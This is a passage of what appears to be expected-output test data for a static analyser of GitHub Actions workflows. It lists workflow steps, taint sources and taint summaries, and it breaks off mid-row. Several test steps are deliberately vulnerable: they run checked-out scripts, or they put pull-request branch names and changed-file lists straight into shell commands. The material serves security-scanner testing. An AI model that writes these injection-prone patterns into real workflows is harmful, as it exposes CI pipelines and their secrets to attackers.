.github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:15:14:15:41 | .github/workflows/poisonable_steps.yml@15:14:15:41 | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:14:16:42 | .github/workflows/poisonable_steps.yml@16:14:16:42 | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:14:17:32 | .github/workflows/poisonable_steps.yml@17:14:17:32 | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:14:18:36 | .github/workflows/poisonable_steps.yml@18:14:18:36 | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:14:19:44 | .github/workflows/poisonable_steps.yml@19:14:19:44 | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:14:20:56 | .github/workflows/poisonable_steps.yml@20:14:20:56 | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | 
.github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:14:21:56 | .github/workflows/poisonable_steps.yml@21:14:21:56 | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:14:22:40 | .github/workflows/poisonable_steps.yml@22:14:22:40 | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:14:23:50 | .github/workflows/poisonable_steps.yml@23:14:23:50 | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:9:25:6 | .github/workflows/poisonable_steps.yml@24:9:25:6 | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:14:24:29 | .github/workflows/poisonable_steps.yml@24:14:24:29 | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:9:26:6 | .github/workflows/poisonable_steps.yml@25:9:26:6 | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:14:25:73 | .github/workflows/poisonable_steps.yml@25:14:25:73 | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:9:27:6 | .github/workflows/poisonable_steps.yml@26:9:27:6 | +| .github/workflows/poisonable_steps.yml:26:14:26:78 
| python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:14:26:78 | .github/workflows/poisonable_steps.yml@26:14:26:78 | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:9:28:6 | .github/workflows/poisonable_steps.yml@27:9:28:6 | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:9:30:6 | .github/workflows/poisonable_steps.yml@29:9:30:6 | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:9:31:6 | .github/workflows/poisonable_steps.yml@30:9:31:6 | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:14:30:46 | .github/workflows/poisonable_steps.yml@30:14:30:46 | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:9:32:6 | .github/workflows/poisonable_steps.yml@31:9:32:6 | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | 
.github/workflows/poisonable_steps.yml:31:14:31:44 | .github/workflows/poisonable_steps.yml@31:14:31:44 | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:9:33:6 | .github/workflows/poisonable_steps.yml@32:9:33:6 | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:14:32:44 | .github/workflows/poisonable_steps.yml@32:14:32:44 | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:9:34:6 | .github/workflows/poisonable_steps.yml@33:9:34:6 | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:14:33:35 | .github/workflows/poisonable_steps.yml@33:14:33:35 | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:9:35:6 | .github/workflows/poisonable_steps.yml@34:9:35:6 | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:14:34:52 | .github/workflows/poisonable_steps.yml@34:14:34:52 | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:9:36:6 | .github/workflows/poisonable_steps.yml@35:9:36:6 | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:14:35:26 | .github/workflows/poisonable_steps.yml@35:14:35:26 | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:9:37:6 | .github/workflows/poisonable_steps.yml@36:9:37:6 | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:14:36:86 | .github/workflows/poisonable_steps.yml@36:14:36:86 | +| 
.github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:9:38:6 | .github/workflows/poisonable_steps.yml@37:9:38:6 | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:14:37:51 | .github/workflows/poisonable_steps.yml@37:14:37:51 | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:9:39:6 | .github/workflows/poisonable_steps.yml@38:9:39:6 | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:9:42:6 | .github/workflows/poisonable_steps.yml@41:9:42:6 | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:9:46:111 | 
.github/workflows/poisonable_steps.yml@42:9:46:111 | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:14:46:111 | .github/workflows/poisonable_steps.yml@42:14:46:111 | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:44:32:44:50 | .github/workflows/poisonable_steps.yml@44:32:44:50 | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | .github/workflows/shell.yml:5:5:9:2 | .github/workflows/shell.yml@5:5:9:2 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:7:9:9:2 | .github/workflows/shell.yml@7:9:9:2 | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | .github/workflows/shell.yml:8:14:8:31 | .github/workflows/shell.yml@8:14:8:31 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | .github/workflows/shell.yml:10:5:14:2 | .github/workflows/shell.yml@10:5:14:2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:12:9:14:2 | .github/workflows/shell.yml@12:9:14:2 | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | .github/workflows/shell.yml:12:14:12:23 | .github/workflows/shell.yml@12:14:12:23 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | .github/workflows/shell.yml:15:5:19:2 | .github/workflows/shell.yml@15:5:19:2 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:17:9:19:2 | .github/workflows/shell.yml@17:9:19:2 | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | .github/workflows/shell.yml:18:14:18:23 | .github/workflows/shell.yml@18:14:18:23 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | .github/workflows/shell.yml:20:5:22:32 | .github/workflows/shell.yml@20:5:22:32 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | 
.github/workflows/shell.yml:22:9:22:32 | .github/workflows/shell.yml@22:9:22:32 | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | .github/workflows/shell.yml:22:14:22:31 | .github/workflows/shell.yml@22:14:22:31 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | 
.github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | +scopes +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES | filename | manual | +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES_EXTENSIONS | filename | manual | +| Rishabh510/Path-lister-action | * | output.paths | filename | manual | +| WyriHaximus/github-action-files-in-commit | * | output.files | filename | manual | +| ab185508/file-type-finder | * | output.extaddpaths | filename | manual | +| ab185508/file-type-finder | * | output.names | filename | manual | +| ab185508/file-type-finder | * | output.paths | filename | manual | +| ahmadnassri/action-changed-files | * | output.files | filename | manual | +| ahmadnassri/action-changed-files | * | output.json | json | manual | +| alessbell/pull-request-comment-branch | * | 
output.head_ref | branch | manual | +| amannn/action-semantic-pull-request | * | output.error_message | text | manual | +| ankitjain28may/list-files-in-pr | * | output.pullRequestFiles | filename | manual | +| cypress-io/github-action | * | env.GH_BRANCH | branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | +| eficode/resolve-pr-refs | * | output.head_ref | branch | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | +| gotson/pull-request-comment-branch | * | output.head_ref | branch | manual | +| jitterbit/get-changed-files | * | output.added | filename | manual | +| jitterbit/get-changed-files | * | output.added_modified | filename | manual | +| jitterbit/get-changed-files | * | output.all | filename | manual | +| jitterbit/get-changed-files | * | output.deleted | filename | manual | +| jitterbit/get-changed-files | * | output.modified | filename | manual | +| jitterbit/get-changed-files | * | output.removed | filename | manual | +| jitterbit/get-changed-files | * | output.renamed | filename | manual | +| jsmith/changes-since-last-tag | * | output.added | filename | manual | +| jsmith/changes-since-last-tag | * | output.files | filename | manual | +| jsmith/changes-since-last-tag | * | output.modified | filename | manual | +| jsmith/changes-since-last-tag | * | output.removed | filename | manual | +| jsmith/changes-since-last-tag | * | output.renamed | filename | manual | +| karpikpl/list-changed-files-action | * | output.changed_files | filename | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| knu/changed-files | * | output.changed_files | filename | manual | +| knu/changed-files | * | output.changed_files_json | filename | manual | +| knu/changed-files | * | 
output.matched_files | filename | manual | +| knu/changed-files | * | output.matched_files_json | filename | manual | +| lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | +| lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | +| marocchino/on_artifact | * | output.* | artifact | manual | +| martinhaintz/ga-file-list | * | output.file_names | filename | manual | +| martinhaintz/ga-file-list | * | output.files | filename | manual | +| peter-murray/issue-body-parser-action | * | output.* | text | manual | +| peter-murray/issue-forms-body-parser | * | output.payload | text | manual | +| potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | +| the-coding-turtle/ga-file-list | * | output.file_names | filename | manual | +| the-coding-turtle/ga-file-list | * | output.files | filename | manual | +| tim-actions/get-pr-commits | * | output.commits | text | manual | +| tj-actions/branch-names | * | output.current_branch | branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | branch | manual | +| trilom/file-changes-action | * | output.files | filename | manual | +| trilom/file-changes-action | * | output.files_added | filename | manual | +| trilom/file-changes-action | * | output.files_modified | filename | manual | +| trilom/file-changes-action | * | output.files_removed | filename | manual | +| tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| w3f/action-find-old-files | * | output.files | filename | manual | +| xt0rted/pull-request-comment-branch | * | output.head_ref | 
branch | manual | +| yumemi-inc/changed-files | * | output.files | filename | manual | +summaries +| ActionsTools/read-json-action | * | artifact | output.* | taint | manual | +| AsasInnab/regex-action | * | input.search_string | output.first_match | taint | manual | +| BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | +| MeilCli/regex-match | * | input.search_string | output.matched_first | taint | manual | +| MeilCli/regex-match | * | input.search_string | output.matched_json | taint | manual | +| Reedyuk/read-properties | * | artifact | output.value | taint | manual | +| SebRollen/toml-action | * | artifact | output.value | taint | manual | +| actions-ecosystem/action-regex-match | * | input.text | output.* | taint | manual | +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| andstor/file-reader-action | * | artifact | output.contents | taint | manual | +| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| artlaman/conventional-changelog-reader-action | * | artifact | output.* | taint | manual | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | +| aws-actions/configure-aws-credentials | * | 
input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | +| bfren/read-file | * | artifact | output.contents | taint | manual | +| bobheadxi/deployments | * | input.env | output.env | taint | manual | +| browniebroke/read-nvmrc-action | * | artifact | output.node_version | taint | manual | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| c-py/action-dotenv-to-setenv | * | artifact | output.* | taint | manual | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| christian-draeger/read-properties | * | artifact | output.* | taint | manual | +| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | +| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| dangdennis/toml-action | * | artifact | output.value | taint | manual | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | 
manual | +| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | +| drawpile/drawpile | * | input.path | output.path | taint | manual | +| dsfx3d/action-extract-unique-matches | * | input.text | output.matches | taint | manual | +| duskmoon314/action-load-env | * | artifact | output.* | taint | manual | +| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | +| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | +| frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | +| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| gagle/package-version | * | artifact | output.version | taint | manual | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | +| getsentry/action-release | * | input.version | output.version | taint | manual | +| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | +| github/codeql-action | * | input.output | output.sarif-output | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| guibranco/github-file-reader-action-v2 | * | artifact | output.contents | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | +| 
hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | +| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | +| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | +| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | +| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| igorskyflyer/action-readfile | * | artifact | output.content | taint | manual | +| jaywcjlove/github-action-read-file | * | artifact | output.content | taint | manual | +| jbutcher5/read-yaml | * | artifact | output.data | taint | manual | +| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| juliangruber/read-file-action | * | artifact | output.content | taint | manual | +| 
jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| kaisugi/action-regex-match | * | input.text | output.* | taint | manual | +| komorebitech/read-files-action | * | artifact | output.content | taint | manual | +| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | +| kurt-code/gha-properties | * | artifact | output.* | taint | manual | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| linkerd/linkerd2 | * | input.component | output.image | taint | manual | +| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | +| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| madhead/read-java-properties | * | artifact | output.* | taint | manual | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mindsers/changelog-reader-action | * | artifact | output.* | taint | manual | +| miraai/read-helm-chart-yaml | * | artifact | output.* | taint | manual | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| nichmor/minimal-read-yaml | * | artifact | output.* | taint | manual | +| novuhq/novu | * | 
input.docker_name | output.image | taint | manual | +| paulschuberth/regex-extract-action | * | input.haystack | output.matches | taint | manual | +| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | +| pietrobolcato/action-read-yaml | * | artifact | output.* | taint | manual | +| release-kit/regex | * | input.string | output.* | taint | manual | +| rexdefuror/read-package-json | * | artifact | env.* | taint | manual | +| romanlamsal/dotenv-concat | * | artifact | output.* | taint | manual | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| sammcj/dotenv-output-action | * | artifact | output.* | taint | manual | +| satya-500/read-file-github-action | * | artifact | output.contents | taint | manual | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| simonblund/version-reader | * | artifact | output.version | taint | manual | +| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | +| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| tmelliottjr/extract-regex-action | * | input.input | 
